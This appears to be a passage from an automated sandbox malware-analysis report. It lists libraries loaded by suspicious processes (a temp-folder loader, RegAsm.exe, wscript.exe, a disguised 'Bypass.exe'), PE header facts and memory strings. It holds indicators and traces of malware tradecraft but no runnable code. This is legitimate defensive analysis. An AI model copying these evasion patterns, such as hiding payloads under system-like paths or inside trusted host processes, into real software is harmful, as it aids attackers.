                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: pcacli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\Loader\Loader.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: textshaping.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: mscoree.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: apphelp.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: kernel.appcore.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: version.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: uxtheme.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: windows.storage.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: wldp.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: profapi.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: cryptsp.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: rsaenh.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: cryptbase.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: sspicli.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: amsi.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: userenv.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: wbemcomn.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: iphlpapi.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: dnsapi.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: dhcpcsvc.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: winnsi.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: rasapi32.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: rasman.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: rtutils.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: mswsock.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: winhttp.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: rasadhlp.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: fwpuclnt.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: winmm.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: winmmbase.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: mmdevapi.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: devobj.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: ksuser.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: avrt.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: audioses.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: powrprof.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: umpdc.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: msacm32.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: midimap.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: secur32.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: schannel.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: edputil.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: windowscodecs.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: ntmarta.dll
                      Source: C:\ProgramData\SoftwareDistribution\Bypass.exeSection loaded: dpapi.dll
                      Source: C:\Users\user\Desktop\bFZYRLnRIz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: bFZYRLnRIz.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: bFZYRLnRIz.exeStatic file information: File size 1939559 > 1048576
                      Source: bFZYRLnRIz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: bFZYRLnRIz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: bFZYRLnRIz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: bFZYRLnRIz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: bFZYRLnRIz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: bFZYRLnRIz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: bFZYRLnRIz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: bFZYRLnRIz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: ~C:\Users\user\AppData\Local\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: }C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005474000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: eC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: krnlmp.pdb\*\* source: Bypass.exe, 0000000F.00000002.4223150411.000000001BBCF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.000000000490D000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: gC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: kC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005043000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000004ABF000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000005400000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: Bypass.exe, 0000000F.00000002.4119735415.0000000003E06000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: lC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: Bypass.exe, 0000000F.00000002.4119735415.0000000004DBE000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: xC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: Bypass.exe, 0000000F.00000002.4119735415.00000000036B4000.00000004.00000800.00020000.00000000.sdmp
